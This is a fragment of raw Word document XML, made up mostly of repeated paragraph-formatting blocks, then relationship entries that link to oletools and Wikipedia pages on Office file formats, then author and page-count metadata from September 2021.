                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="458645852">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="477845220">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="108936676">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1821071123">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="524175804">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1261841840">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1523084444">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1003582366">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="392044709">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1786465779">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="237178533">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1792093546">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1515606580">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="997222901">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="19742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decalage2/oletools/issues" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/List_of_file_signature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en.wikipedia.org/wiki/Microsoft_Office"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Compound_File_Binary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40</Pages>
  <Words>3937</Words>
  <Characters>22442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R Krishnan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ananthu R Krishnan</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-09-18T04:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-18T18:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>